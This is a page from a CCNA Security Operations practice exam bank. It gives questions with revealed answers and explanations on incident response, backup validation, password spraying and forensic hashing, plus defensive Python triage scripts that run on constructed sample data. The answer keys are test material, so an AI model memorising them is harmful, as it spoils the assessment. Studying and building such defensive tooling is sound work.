CCNA Security Operations Questions

75 of 291 questions · Page 2/4 · Security Operations · Answers revealed

76
Multi-Select · hard

After a ransomware incident, management sees that last night's backups completed successfully and wants proof they can actually be used before production is declared recovered. Which three actions best validate recoverability? Select three.

Select 3 answers
A. Restore a representative backup into an isolated test environment.
B. Run application and data validation checks on the restored system.
C. Measure the restore duration against the documented recovery objectives.
D. Increase the retention period without performing any restore.
E. Close the incident because the backup software reported a successful job completion.
Answers: A, B, C

A real restore test shows whether the backup can be recovered without risking production data.

Why this answer

Option A is correct because restoring a representative backup into an isolated test environment directly validates that the backup data is readable, the restore process works, and the system can be brought online without impacting production; a successful job log alone shows none of this. Option B is correct because a mounted disk is not a working system: databases must open cleanly, applications must start, and sample records or transactions must look right before anyone can say the data is usable. Option C is correct because a restore that works but takes longer than the documented RTO, or that uses a backup older than the RPO allows, still fails the recovery objective.

Exam trap

The trap here is that candidates assume a successful backup job log is sufficient proof of recoverability, but the exam emphasizes that only a verified restore in a test environment confirms the backup is usable: a "job completed" status shows that the write finished, not that the data can be read back, is uncorrupted, or brings the application up.

77
MCQ · medium

The SOC has contained a mailbox compromise by resetting the password and revoking active sessions. Investigation shows the attacker created an automatic forwarding rule and added an OAuth consent grant. What should happen next to eradicate the threat?

A. Notify all employees to be more careful with email before taking any technical steps.
B. Delete the mailbox and create a new account for the user immediately.
C. Remove the malicious forwarding rule and review or revoke suspicious OAuth app grants.
D. Restore the user's messages from backup and reopen access without further review.
Answer: C

Eradication means removing the adversary's persistence mechanisms and closing the foothold they created. In a mailbox compromise, forwarding rules and unauthorized OAuth consents are common persistence methods. Removing those artifacts, then confirming no other malicious rules or delegated access remain, is the correct next step before returning the account to normal use and monitoring for recurrence.

Why this answer

Option C is correct because the immediate next step after containment is to remove the attacker's persistence mechanisms. The malicious forwarding rule silently copies the victim's mail to an attacker-controlled address, and the OAuth consent grant gives an attacker-controlled application API access to the mailbox on the user's behalf. Neither is undone by resetting the password and revoking sessions: the rule stays in the mailbox and the consent grant remains in the tenant until each is explicitly removed. The review should also cover mailbox-level forwarding (which is configured separately from inbox rules), delegate permissions, and any further rules the attacker may have staged.

Exam trap

The trap here is that candidates assume a password reset and session revocation fully remediate the compromise, overlooking the fact that OAuth consent grants and mailbox forwarding rules are independent persistence mechanisms that must be explicitly removed.

How to eliminate wrong answers

Option A is wrong because notifying employees to be more careful is a general awareness step, not a technical eradication action, and it delays removing the attacker's active persistence mechanisms. Option B is wrong because deleting the mailbox and creating a new account is an overly destructive step that destroys forensic evidence and disrupts business operations; the correct approach is to surgically remove the malicious rules and grants while preserving the mailbox for investigation. Option D is wrong because restoring from backup and reopening access without reviewing or removing the forwarding rule and OAuth grant would re-introduce the same persistence mechanisms, leaving the compromise active.
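The eradication review described above, as an added example (not code from the page or from any vendor): it triages two exports an analyst would pull after a mailbox compromise, inbox rules (field names mirror what Exchange Online's Get-InboxRule returns) and Microsoft Graph oauth2PermissionGrant objects, and builds the worklist of artifacts to remove. The tenant domain, the risky-scope watch-list, the hiding-folder list and every record are constructed assumptions.

```python
"""Post-containment triage of mailbox persistence artifacts (added example).

Not code from the page or any vendor. Inputs imitate an inbox-rule export
(field names as in Get-InboxRule output) and Microsoft Graph
oauth2PermissionGrant objects. All records below are constructed.
"""
from dataclasses import dataclass

INTERNAL_DOMAINS = {"example.com"}  # assumed tenant domains

# Delegated scopes that let an app read or send the user's mail or keep
# refreshing its own tokens (assumed watch-list; tune to your tenant).
RISKY_SCOPES = {"Mail.Read", "Mail.ReadWrite", "Mail.Send",
                "MailboxSettings.ReadWrite", "offline_access"}

# Folders attackers use to bury inbound mail so the victim never sees replies.
HIDING_FOLDERS = {"rss feeds", "rss subscriptions", "conversation history", "junk email"}


@dataclass
class Finding:
    kind: str        # "inbox_rule", "mailbox_forwarding" or "oauth_grant"
    identifier: str  # rule name, mailbox identity, or grant id
    reason: str


def external_addresses(addresses):
    """Return the recipients whose domain is not one of ours."""
    return [a for a in addresses if a.rsplit("@", 1)[-1].lower() not in INTERNAL_DOMAINS]


def triage_inbox_rules(rules):
    """Flag rules that forward/redirect externally or hide inbound mail."""
    findings = []
    for rule in rules:
        targets = ((rule.get("ForwardTo") or []) + (rule.get("ForwardAsAttachmentTo") or [])
                   + (rule.get("RedirectTo") or []))
        ext = external_addresses(targets)
        if ext:
            findings.append(Finding("inbox_rule", rule["Name"],
                                    "sends mail to external " + ", ".join(ext)))
        folder = (rule.get("MoveToFolder") or "").lower()
        if rule.get("DeleteMessage") or folder in HIDING_FOLDERS:
            findings.append(Finding("inbox_rule", rule["Name"], "hides or deletes inbound mail"))
    return findings


def triage_mailbox_forwarding(mailbox):
    """Mailbox-level forwarding is configured separately from inbox rules."""
    target = mailbox.get("ForwardingSmtpAddress") or mailbox.get("ForwardingAddress")
    if target and external_addresses([target.replace("smtp:", "")]):
        return [Finding("mailbox_forwarding", mailbox["Identity"], "forwards to " + target)]
    return []


def triage_oauth_grants(grants, principal_id):
    """Flag delegated grants for this user whose scopes include risky ones."""
    findings = []
    for grant in grants:
        if grant.get("principalId") != principal_id:
            continue
        risky = sorted(set(grant.get("scope", "").split()) & RISKY_SCOPES)
        if risky:
            findings.append(Finding("oauth_grant", grant["id"],
                                    "app %s holds %s" % (grant["clientId"], " ".join(risky))))
    return findings


# --- constructed sample exports -------------------------------------------
SAMPLE_RULES = [
    {"Name": "Newsletters", "MoveToFolder": "Newsletters"},
    {"Name": ".", "ForwardAsAttachmentTo": ["drop@attacker-mail.example"],
     "MoveToFolder": "RSS Feeds"},                       # one-character rule name, a common attacker habit
    {"Name": "Hide invoices", "DeleteMessage": True},
]
SAMPLE_MAILBOX = {"Identity": "victim@example.com",
                  "ForwardingSmtpAddress": "smtp:victim.backup@attacker-mail.example"}
SAMPLE_GRANTS = [
    {"id": "grant-1", "principalId": "user-42", "clientId": "app-calendar", "scope": "User.Read"},
    {"id": "grant-2", "principalId": "user-42", "clientId": "app-9f3c",
     "scope": "Mail.ReadWrite offline_access"},
    {"id": "grant-3", "principalId": "user-7", "clientId": "app-9f3c", "scope": "Mail.Read"},
]


def eradication_worklist(rules, mailbox, grants, principal_id):
    """Everything that must be removed before the account returns to normal use."""
    return (triage_inbox_rules(rules) + triage_mailbox_forwarding(mailbox)
            + triage_oauth_grants(grants, principal_id))


if __name__ == "__main__":
    for f in eradication_worklist(SAMPLE_RULES, SAMPLE_MAILBOX, SAMPLE_GRANTS, "user-42"):
        print(f.kind, f.identifier, "->", f.reason)
```

On the sample data the worklist contains five items: the "." rule twice (external forward and hidden folder), the delete rule, the mailbox-level forward, and grant-2. Grant-3 belongs to a different user and shows why the grant query must be scoped to the compromised principal rather than to the app alone; an app that has been abused against one user is still worth reviewing tenant-wide afterwards.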

78
MCQ · medium

Based on the exhibit, which change best helps the company meet its recovery objectives after a ransomware event?

A. Increase the retention period on the existing NAS backups to one year.
B. Move backups to an immutable, offline or logically isolated repository and test restores regularly.
C. Store the backup administrator password in a shared team spreadsheet so more staff can restore data quickly.
D. Replace the nightly full backup with a longer full backup window to capture more data each day.
Answer: B

An isolated, immutable backup target reduces the chance that ransomware can encrypt or delete backups. Regular restore testing confirms that the company can actually recover within the stated RTO and RPO. Because the current repository is domain-joined and reachable over SMB, it is too exposed. Isolation and tested recovery provide the strongest practical resilience improvement.

Why this answer

Option B is correct because ransomware often encrypts or deletes accessible backups. An immutable, offline, or logically isolated repository prevents attackers from modifying or deleting backup data, ensuring a clean recovery point. Regularly testing restores validates that the backups are functional and meet recovery objectives (RTO/RPO).

This aligns with the 3-2-1 backup rule and NIST SP 800-184 guidance for ransomware recovery.

Exam trap

The trap here is that candidates often assume longer retention or more frequent backups alone improve recovery, but they overlook the need for isolation and immutability to protect against ransomware's ability to target accessible backup data.

How to eliminate wrong answers

Option A is wrong because increasing the retention period on existing NAS backups does not protect them from being encrypted or deleted by ransomware if the NAS is network-accessible; retention alone does not provide immutability or isolation. Option C is wrong because storing the backup administrator password in a shared team spreadsheet violates the principle of least privilege and introduces a security risk; it does not improve recovery speed or integrity and could lead to unauthorized access or credential theft. Option D is wrong because replacing the nightly full backup with a longer full backup window does not inherently improve recovery objectives; it may increase the backup window and data captured but does not address ransomware resilience, and longer backups can increase exposure to corruption or encryption during the backup window.

79
MCQ · hard

Based on the exhibit, what is the most likely conclusion after correlating the logs? A configuration-management task ran from a jump host and generated repeated login alerts on target servers. The SOC wants to determine whether this is malicious activity or approved automation.

A. This is a true brute-force attack because any failed login must be malicious.
B. This is a likely false positive caused by approved automation, so the alert should be correlated with the change window.
C. This indicates DNS poisoning because both servers were contacted from the same source IP.
D. This is proof of ransomware spreading laterally over SMB.
Answer: B

The alert lines up with an approved maintenance window, a known jump host, and a documented configuration-management account that should only be used by automation. The mixed failed-and-successful logins are consistent with scripts negotiating authentication rather than an intruder guessing passwords. The SOC should confirm the change record, document the benign cause, and adjust correlation rules if this pattern recurs.

Why this answer

Option B is correct because the logs show repeated login attempts from a jump host, a common pattern for configuration-management tools (e.g., Ansible, Puppet) that execute tasks across multiple servers. The SOC should correlate these events with the approved change window to confirm they are part of legitimate automation, not malicious activity. Failed logins alone do not indicate a brute-force attack: automation commonly produces a failure followed by a success when it tries one authentication method before another (a key before a password, for example), or when a credential has just been rotated.

Exam trap

The trap here is that candidates assume any failed login attempt is malicious, but the exam tests the ability to correlate logs with operational context (e.g., change windows, known source IPs) to identify false positives from legitimate automation.

How to eliminate wrong answers

Option A is wrong because it assumes any failed login is malicious, ignoring that automation tools often generate failed login events for benign reasons (e.g., trying one credential type before another, a just-rotated credential) and that a true brute-force attack would show a high volume of rapid, sequential attempts from an external or unexpected source IP. Option C is wrong because DNS poisoning involves manipulating DNS responses to redirect traffic to malicious IPs, which is unrelated to repeated login alerts from a jump host; the same source IP contacting multiple servers is normal for centralized management. Option D is wrong because ransomware spreading laterally over SMB would show evidence of file writes, encryption activity, or SMB share enumeration and remote execution (e.g., PsExec-style service creation or exploitation of a vulnerable SMB service), not simply repeated login alerts from a jump host.
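The correlation step the explanation calls for, as an added example (not from the page): each login alert is checked against the approved change record on four points, time window, source host, account and target scope, and anything that misses on any point stays open for investigation. The alerts, the change record and the field names are constructed; a real SOC would pull them from the SIEM and the change-management system.

```python
"""Correlate repeated-login alerts with change records (added example).

Not from the page. Alerts, change records and field names are constructed.
"""
from datetime import datetime

# Constructed alerts: one per login event observed on the target servers.
ALERTS = [
    {"ts": "2024-05-02T01:05:10+00:00", "src": "jump01", "account": "svc-ansible",
     "target": "web01", "outcome": "failure"},
    {"ts": "2024-05-02T01:05:11+00:00", "src": "jump01", "account": "svc-ansible",
     "target": "web01", "outcome": "success"},
    {"ts": "2024-05-02T01:06:02+00:00", "src": "jump01", "account": "svc-ansible",
     "target": "web02", "outcome": "failure"},
    {"ts": "2024-05-02T01:06:03+00:00", "src": "jump01", "account": "svc-ansible",
     "target": "web02", "outcome": "success"},
    # The automation account used from a finance workstation, outside the window.
    {"ts": "2024-05-02T02:40:00+00:00", "src": "ws-finance-07", "account": "svc-ansible",
     "target": "web02", "outcome": "failure"},
]

# Constructed approved change: the automation account may log in to these
# targets from the jump host during the window.
CHANGES = [
    {"id": "CHG-1042", "start": "2024-05-02T01:00:00+00:00", "end": "2024-05-02T01:30:00+00:00",
     "source": "jump01", "account": "svc-ansible", "targets": {"web01", "web02"}},
]


def _t(s):
    return datetime.fromisoformat(s)


def disposition(alert, changes):
    """Return ("approved_automation", change_id) or ("investigate", reasons).

    An alert is explained only when every attribute matches one change record;
    the reasons reported are those for the last record tried.
    """
    ts = _t(alert["ts"])
    reasons = []
    for chg in changes:
        reasons = []
        if not (_t(chg["start"]) <= ts <= _t(chg["end"])):
            reasons.append("outside window of %s" % chg["id"])
        if alert["src"] != chg["source"]:
            reasons.append("source %s is not the approved host %s" % (alert["src"], chg["source"]))
        if alert["account"] != chg["account"]:
            reasons.append("account %s not named in change" % alert["account"])
        if alert["target"] not in chg["targets"]:
            reasons.append("target %s not in change scope" % alert["target"])
        if not reasons:
            return "approved_automation", chg["id"]
    return "investigate", reasons or ["no change record matches"]


def triage(alerts, changes):
    """Count explained alerts and keep the unexplained ones with their reasons."""
    summary = {"approved_automation": 0, "investigate": 0}
    open_items = []
    for alert in alerts:
        verdict, detail = disposition(alert, changes)
        summary[verdict] += 1
        if verdict == "investigate":
            open_items.append({"alert": alert, "reasons": detail})
    return {"summary": summary, "open_items": open_items}


if __name__ == "__main__":
    result = triage(ALERTS, CHANGES)
    print(result["summary"])
    for item in result["open_items"]:
        print(item["alert"]["ts"], item["alert"]["src"], "->", "; ".join(item["reasons"]))
```

The four jump-host events are closed against CHG-1042 and documented as the benign cause. The fifth is the one that matters: an account that should only ever be used by automation appears from a workstation outside any window, which is exactly the pattern a correlation rule should keep firing on after the automation noise has been tuned out.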

80
MCQ · hard

A security analyst is reviewing firewall logs and notices repeated connection attempts from a single external IP address to multiple internal IP addresses on TCP port 22 (SSH). Each attempt uses a different username but the same password: 'Spring2024!'. The attempts occur sporadically over a 12-hour period. Which type of attack is most likely being observed?

A. Brute-force attack
B. Dictionary attack
C. Password spraying attack
D. Man-in-the-middle attack
Answer: C

Password spraying involves an attacker trying a small number of commonly used passwords against many different accounts to avoid lockout and evade detection. The use of a single password against many usernames exactly matches this technique, and spreading the attempts over 12 hours keeps each account well under any lockout threshold.

Why this answer

This is a password spraying attack because the attacker uses a single common password ('Spring2024!') against multiple usernames across different internal IP addresses, attempting to avoid account lockout by spreading attempts over time and targets. Unlike brute-force or dictionary attacks that focus many passwords against a single account, password spraying targets many accounts with a few weak passwords, making it harder to detect via failed login thresholds.

Exam trap

The trap here is that candidates confuse 'multiple passwords against one user' (brute-force/dictionary) with 'one password against multiple users' (password spraying), especially when the scenario mentions 'different username' and 'same password' — a classic sign of a spraying attack.

How to eliminate wrong answers

Option A is wrong because a brute-force attack tries many passwords against a single username, not a single password against many usernames. Option B is wrong because a dictionary attack uses a list of possible passwords against one account, not a single password across multiple accounts. Option D is wrong because a man-in-the-middle attack intercepts or relays communications between two parties, which is not indicated by repeated SSH connection attempts from an external IP.

81
MCQ · hard

Based on the exhibit, what is the best immediate action for the SOC or IR team? A finance workstation shows evidence of a macro-launched script, followed by file renaming and lateral SMB traffic to two other hosts. The team has not yet determined the full scope of the incident.

A. Isolate the host from the network and revoke its remote access to stop further spread.
B. Restore the workstation from backup immediately before preserving any evidence.
C. Run a vulnerability scan against the subnet to see whether the malware exploited an unpatched service.
D. Notify users to ignore the issue until the next maintenance window because the incident is likely self-limiting.
Answer: A

The workstation shows active compromise with file encryption behavior and outbound lateral movement. Immediate containment should stop additional SMB propagation and protect neighboring systems before deeper analysis begins.

Why this answer

The exhibit shows a macro-launched script, file renaming, and lateral SMB traffic to two other hosts, indicating active lateral movement. Isolating the host (e.g., via network access control, EDR network isolation, or disabling the switch port) immediately stops the spread of the malware to other systems, preserving the ability to investigate without further compromise. This follows the incident response sequence: once an active compromise has been identified, containment comes before eradication and recovery.

Exam trap

The trap here is that candidates may choose Option C (vulnerability scan) because they think identifying the root cause is the priority, but in an active incident with lateral movement, containment (isolation) must come first per the NIST SP 800-61 incident response framework.

How to eliminate wrong answers

Option B is wrong because restoring from backup before preserving evidence destroys volatile data and artifacts (e.g., memory, logs, renamed files) that are critical for forensic analysis and understanding the attack vector. Option C is wrong because running a vulnerability scan is a slow step that does nothing about the lateral movement already under way; an active scan also adds its own traffic and alerts to a network that is already noisy, and can tip off an attacker who is watching the hosts. Option D is wrong because the incident is not self-limiting: macro-launched scripts and SMB lateral movement indicate an active, spreading threat that requires immediate action, not deferral to a maintenance window.

82
MCQ · medium

A SOC analyst is reviewing logs from a Windows domain controller and notices a large number of failed logon attempts (Event ID 4625) from a single source IP address within a five-minute window. The account names used are random strings such as "a1b2c3", "x9y8z7", etc. The analyst then checks the source IP and finds it is a known external address from a foreign country. Which of the following is the most appropriate next step for the analyst to take?

A. Immediately block the IP address at the perimeter firewall.
B. Investigate whether any of the attempted accounts correspond to actual domain users.
C. Run a full antivirus scan on the domain controller.
D. Notify the company's legal department for law enforcement involvement.
Answer: B

This is the correct first step. If any of the attempted account names match legitimate domain accounts, it indicates a targeted attack and possible credential compromise. The failures should also be paired with any successful logons (Event ID 4624) from the same source IP, which are recorded separately and are easy to miss when only 4625 events are reviewed. This investigation guides subsequent containment and remediation.

Why this answer

Option B is correct because the analyst must first determine if any of the randomly generated account names match existing domain user accounts. If a match is found, it indicates a targeted password-spraying or brute-force attack against valid accounts, requiring immediate account lockdown and credential reset. This investigation step aligns with the incident response process of identification before containment or escalation.

Exam trap

The trap here is that candidates may jump to immediate blocking (Option A) as a reflexive security action, but the exam emphasizes following the incident response process: identify and analyze before containing.

How to eliminate wrong answers

Option A is wrong because immediately blocking the IP at the perimeter firewall without confirming the attack's success or impact may disrupt legitimate traffic and bypasses proper incident response procedures. Option C is wrong because a full antivirus scan on the domain controller addresses malware, not authentication-based attacks like brute-force or password spraying; the logs show failed logon attempts, not signs of infection. Option D is wrong because notifying the legal department for law enforcement involvement is premature before confirming the attack's effectiveness or scope; this step typically occurs after containment and evidence collection.

83
MCQ · medium

You are handed a company laptop suspected in an insider theft case. Legal says the evidence may be needed in court. Which action best preserves admissibility?

A. Browse the drive directly on the original laptop to identify the most relevant files.
B. Create a forensic image using a write blocker and record hash values.
C. Email the user asking them to return any copies they may have made.
D. Mount the drive read-write so searching and exporting data will be faster.
Answer: B

A forensic image taken through a write blocker is the best choice because it preserves the original media and reduces the chance of accidental modification. Recording cryptographic hash values before and after acquisition helps prove integrity and supports chain of custody. That combination is standard practice when evidence might be examined in a disciplinary, regulatory, or legal setting.

Why this answer

Option B is correct because creating a forensic image with a write blocker ensures the original evidence remains unaltered, preserving its integrity for court admissibility. Recording hash values (e.g., SHA-256) provides a cryptographic fingerprint that can later verify the image is an exact copy, meeting legal standards for chain of custody and authenticity.

Exam trap

The trap here is that candidates may think direct browsing or read-write mounting is faster and acceptable, but they fail to recognize that any write access—even unintentional—breaks forensic integrity and admissibility in legal proceedings.

How to eliminate wrong answers

Option A is wrong because directly browsing the drive on the original laptop modifies file metadata (e.g., last access time) and risks accidental alteration, which can break the chain of custody and render evidence inadmissible. Option C is wrong because emailing the user does not preserve evidence; it may alert the suspect, leading to data destruction, and provides no forensic integrity or verifiable chain of custody. Option D is wrong because mounting the drive read-write allows write operations that alter the original data, destroying its forensic integrity and making it inadmissible in court.

84
MCQ · medium

After seizing a suspect's laptop, a responder creates a bit-for-bit disk image using a write blocker. The legal team wants the next step that most directly supports evidence integrity for later review. What should the responder do?

A. Open the image file and browse folders to confirm the contents look normal.
B. Compute and document cryptographic hash values for the source and the image.
C. Rename the image file with the case number and store it on a desktop.
D. Run a full antivirus scan on the image before logging it in.
Answer: B

Matching hash values provide a verifiable record that the acquired image has not been altered since collection.

Why this answer

Computing and documenting cryptographic hash values for both the source drive and the bit-for-bit image creates a digital fingerprint. If the hashes match, it proves the image is an exact, unaltered copy of the original evidence, directly supporting integrity for later review. SHA-256 is the value to rely on; MD5 is collision-prone and, where it still appears in reports, is recorded only as a secondary value for compatibility with older tools. This step is foundational in forensic acquisition to meet legal standards for admissibility.

Exam trap

The trap here is that candidates may think browsing the image is harmless or that antivirus scans are always safe, but the exam tests the strict forensic requirement to never modify original evidence and to use hashing as the sole direct integrity check.

How to eliminate wrong answers

Option A is wrong because browsing the image outside a write-protected forensic tool (for example, mounting it normally and opening folders) can update timestamps and other metadata, and even where nothing changes it yields no documented proof of integrity, which is what the legal team asked for. Option C is wrong because renaming the file and storing it on a desktop provides no integrity verification; it only aids organization and may expose the image to accidental modification. Option D is wrong because an antivirus scanner may quarantine, clean or delete the image file itself if its contents match a signature, breaking the bit-for-bit copy, and it proves nothing about integrity; any scanning should be done on a working copy after the hashes are recorded.

85
Multi-Select · hard

A virtual file server was restored from last night’s backup. The service is online, but some finance users report missing spreadsheet changes and a few files show a 'recovered copy' timestamp. Which two checks should be completed before the team accepts the restore as successful? Select two.

Select 2 answers
A. Compare restored data against backup hashes or a manifest to verify that the copy is complete and uncorrupted.
B. Run an application-level validation test with finance users or sample transactions to confirm the data is usable.
C. Assume the restore is acceptable because the file server is online and users can browse shares.
D. Delete the previous night’s backup so the team will not accidentally restore it again.
E. Expose the restored server directly to the internet so remote users can test it faster.
Answers: A, B

Hash or manifest comparison confirms that the restored files match what was backed up and were not corrupted during storage or recovery. This is a direct integrity check and is more reliable than simply seeing that the server starts. It helps identify silent partial restores.

Why this answer

Option A is correct because comparing restored data against backup hashes or a manifest ensures the data integrity and completeness of the restore process. Even though the file server is online, missing spreadsheet changes and 'recovered copy' timestamps suggest possible corruption or incomplete restoration. Verifying hashes (e.g., SHA-256) against a known-good manifest confirms that every file was restored without bit-rot or truncation, which is a standard post-restore validation step in backup and recovery procedures.

Exam trap

The trap here is that candidates may assume a service being online and shares browsable is sufficient proof of a successful restore, ignoring the need for data integrity verification and application-level validation.
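The hashing used in questions 83 and 84 and the manifest comparison in question 85 rest on the same chunked file hash, so one added example covers all three (it is not code from the page or from any forensic tool). The first half records source and image hashes the way an acquisition log would; the second builds a per-file manifest at backup time and checks a restored tree against it, reporting missing, modified and extra files. The media, the backup tree and the examiner and tool names are constructed in a temporary directory, and SHA-1 stands in as the secondary algorithm that older reports still carry.

```python
"""Acquisition hash record and restore manifest verification (added example).

Not from the page or any forensic tool. Everything hashed here is constructed
in a temporary directory so the module runs stand-alone.
"""
import hashlib
import json
import os
import tempfile
from datetime import datetime, timezone

CHUNK = 1 << 20  # 1 MiB reads: images are far larger than memory


def hash_file(path, algo="sha256"):
    """Stream a file through the chosen digest; never load it whole."""
    h = hashlib.new(algo)
    with open(path, "rb") as f:
        for block in iter(lambda: f.read(CHUNK), b""):
            h.update(block)
    return h.hexdigest()


def acquisition_record(source, image, examiner, tool, algos=("sha256", "sha1")):
    """Hash source media and image with each algorithm and note whether they agree.

    SHA-256 is the authoritative value; the second algorithm is kept only for
    cross-checking against tools or reports that still expect it.
    """
    record = {"acquired_utc": datetime.now(timezone.utc).isoformat(),
              "examiner": examiner, "tool": tool, "hashes": {}}
    for algo in algos:
        s, i = hash_file(source, algo), hash_file(image, algo)
        record["hashes"][algo] = {"source": s, "image": i, "match": s == i}
    record["verified"] = all(v["match"] for v in record["hashes"].values())
    return record


def build_manifest(root):
    """Relative path -> SHA-256 for every file under root (taken at backup time)."""
    manifest = {}
    for dirpath, _, files in os.walk(root):
        for name in files:
            full = os.path.join(dirpath, name)
            manifest[os.path.relpath(full, root).replace(os.sep, "/")] = hash_file(full)
    return manifest


def verify_restore(root, manifest):
    """Compare a restored tree against the backup manifest; any difference fails."""
    current = build_manifest(root)
    missing = sorted(set(manifest) - set(current))
    extra = sorted(set(current) - set(manifest))
    modified = sorted(p for p in set(manifest) & set(current) if manifest[p] != current[p])
    return {"ok": not (missing or extra or modified),
            "missing": missing, "modified": modified, "extra": extra}


def _write(path, data):
    os.makedirs(os.path.dirname(path), exist_ok=True)
    with open(path, "wb") as f:
        f.write(data)


def demo():
    """Constructed scenario: a faithful image, then a restore that silently went wrong."""
    with tempfile.TemporaryDirectory() as tmp:
        # 1. Acquisition: source media and its bit-for-bit image (same constructed bytes)
        payload = os.urandom(2 * CHUNK + 17)
        src, img = os.path.join(tmp, "source.raw"), os.path.join(tmp, "case-001.img")
        _write(src, payload)
        _write(img, payload)
        record = acquisition_record(src, img, "examiner-1", "dd through write blocker")

        # 2. Backup manifest, then a restore with one stale file, one missing, one extra
        backup, restored = os.path.join(tmp, "backup"), os.path.join(tmp, "restored")
        for rel, data in {"finance/q1.xlsx": b"Q1 data", "finance/q2.xlsx": b"Q2 data v2",
                          "notes.txt": b"notes"}.items():
            _write(os.path.join(backup, rel), data)
        manifest = build_manifest(backup)
        _write(os.path.join(restored, "finance/q1.xlsx"), b"Q1 data")
        _write(os.path.join(restored, "finance/q2.xlsx"), b"Q2 data v1")  # older content came back
        _write(os.path.join(restored, "finance/q2 (recovered copy).xlsx"), b"Q2 data v2")
        return {"acquisition": record, "restore": verify_restore(restored, manifest)}


RESULT = demo()

if __name__ == "__main__":
    print(json.dumps(RESULT, indent=2))
```

The restore report is what turns "the server is online" into a decision: the stale q2.xlsx explains the missing spreadsheet changes, the recovered-copy file is the extra entry, and notes.txt never came back at all. None of that is visible from a share listing, which is the point of question 85.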

86
MCQ · medium

After a new MFA policy rollout, the SIEM generates an alert for five failed logins to a SaaS admin portal from one IP, followed by a successful login to the same account from an IP in another country. The account owner says they were in meetings all day. What should the analyst do first?

A. Disable the account immediately without checking any other logs.
B. Correlate identity provider, VPN, and endpoint logs to validate whether the activity matches the user's normal pattern.
C. Delete the alert because MFA was enabled and the login eventually succeeded.
D. Reimage the user's laptop to remove any possible malware right away.
Answer: B

This is the best first step because triage should validate the alert and establish context before disruptive containment. Correlating identity provider, VPN, and endpoint telemetry can show whether the login came from an expected corporate path, a known remote-access method, or a likely compromise. The analyst can then decide whether account disablement, password resets, or escalation is warranted based on evidence rather than a single suspicious event.

Why this answer

Option B is correct because the alert shows a successful login after five failures from a different country, which is a classic indicator of a potential account takeover. The analyst must correlate identity provider logs (e.g., Okta, Azure AD/Microsoft Entra ID) for authentication details, VPN logs for network origination, and endpoint logs for device posture to determine whether the successful login matches the user's normal behavior. This step validates whether the activity is legitimate or malicious before taking any irreversible action.

Exam trap

The trap here is that candidates assume MFA is infallible and ignore the geographic anomaly, leading them to delete the alert (Option C) or take premature action (Option A or D) without performing proper log correlation.

How to eliminate wrong answers

Option A is wrong because disabling the account immediately without checking other logs could disrupt legitimate access and ignores the possibility of a false positive or a misconfigured MFA policy. Option C is wrong because deleting the alert simply because MFA was enabled and the login succeeded overlooks the fact that MFA can be bypassed (e.g., via session hijacking, token replay, or social engineering), and the geographic anomaly warrants investigation. Option D is wrong because reimaging the laptop is a drastic, premature step that assumes compromise without evidence; the analyst must first confirm whether the successful login originated from the user's device or an attacker's system.
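The correlation in option B, as an added example (not from the page or any identity vendor): the successful login is checked against the VPN session table (was the source IP a corporate egress assigned to this user at that time?), the endpoint inventory (did it come from the user's managed, compliant device?) and the preceding identity-provider events (how many failures, from which other IPs, in the minutes before). All records and field names are constructed; the verdict strings and the next-step text are this example's own.

```python
"""Validate a suspicious SaaS login against identity, VPN and endpoint telemetry
(added example, not from the page). All records and field names are constructed.
"""
from datetime import datetime, timedelta

T = datetime.fromisoformat

# Constructed identity-provider log for one account: five failures from one IP,
# then a success from a different country with no managed device attached.
IDP_EVENTS = [
    {"ts": "2024-05-03T09:00:%02d+00:00" % i, "user": "jdoe", "ip": "198.51.100.23",
     "country": "US", "result": "FAIL", "device_id": None} for i in range(5)
] + [
    {"ts": "2024-05-03T09:02:00+00:00", "user": "jdoe", "ip": "203.0.113.77",
     "country": "RO", "result": "SUCCESS", "device_id": None},
]
# Constructed VPN session table (egress IPs the concentrator assigns to users).
VPN_SESSIONS = [
    {"user": "jdoe", "egress_ip": "192.0.2.10",
     "start": "2024-05-03T07:30:00+00:00", "end": "2024-05-03T17:00:00+00:00"},
]
# Constructed endpoint inventory keyed by the device id the IdP records.
MANAGED_DEVICES = {"LAPTOP-JD-01": {"owner": "jdoe", "compliant": True}}


def via_corporate_vpn(login, sessions):
    """True when the login IP was this user's VPN egress during an active session."""
    ts = T(login["ts"])
    return any(s["user"] == login["user"] and s["egress_ip"] == login["ip"]
               and T(s["start"]) <= ts <= T(s["end"]) for s in sessions)


def on_managed_device(login, devices):
    """True when the IdP tied the login to a compliant device owned by this user."""
    dev = devices.get(login.get("device_id") or "")
    return bool(dev and dev["owner"] == login["user"] and dev["compliant"])


def failures_before(login, events, window=timedelta(minutes=15)):
    """Failed attempts on the same account in the minutes before the success."""
    ts = T(login["ts"])
    return [e for e in events if e["user"] == login["user"] and e["result"] == "FAIL"
            and ts - window <= T(e["ts"]) < ts]


def assess(login, events, sessions, devices):
    """Gather the evidence the analyst needs and the verdict it supports."""
    prior = failures_before(login, events)
    evidence = {
        "via_vpn": via_corporate_vpn(login, sessions),
        "managed_device": on_managed_device(login, devices),
        "failures_before": len(prior),
        "other_source_ips": sorted({e["ip"] for e in prior} - {login["ip"]}),
    }
    if evidence["via_vpn"]:
        verdict = "explained_by_vpn"
    elif evidence["managed_device"]:
        verdict = "known_device_confirm_with_user"
    else:
        verdict = "likely_account_takeover"
    evidence["verdict"] = verdict
    evidence["next_step"] = ("disable account, revoke sessions and tokens, reset credentials"
                             if verdict == "likely_account_takeover"
                             else "confirm with user, then document and close")
    return evidence


SUSPICIOUS = IDP_EVENTS[-1]
# A later login from the VPN egress on the managed laptop, for contrast.
BENIGN = {"ts": "2024-05-03T10:15:00+00:00", "user": "jdoe", "ip": "192.0.2.10",
          "country": "US", "result": "SUCCESS", "device_id": "LAPTOP-JD-01"}

if __name__ == "__main__":
    for login in (SUSPICIOUS, BENIGN):
        print(login["ip"], assess(login, IDP_EVENTS, VPN_SESSIONS, MANAGED_DEVICES))
```

The first assessment is the case in the question: no VPN session explains the IP, no managed device is attached, and five failures from another address preceded it, so containment is now evidence-based rather than reflexive. The second shows the same code clearing a login that only looked odd because the user was on the VPN.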

87
MCQ · medium

A security analyst is reviewing authentication logs from a corporate web application. The logs show that over a span of two hours, a single external IP address attempted to log in with 500 different usernames, each using the same password 'Spring2024!'. Only a few of these attempts succeeded. Which type of attack is most likely being observed?

A. Brute force attack
B. Password spraying attack
C. Credential stuffing attack
D. Dictionary attack
Answer: B

Password spraying involves trying a small number of common passwords against many accounts to avoid detection and lockout. The single password used across numerous usernames is the hallmark of this attack.

Why this answer

This is a password spraying attack because the attacker uses a single common password ('Spring2024!') against many different usernames. This technique avoids account lockout policies that typically trigger after multiple failed attempts on a single account, and the few successful logins indicate valid credentials were found.
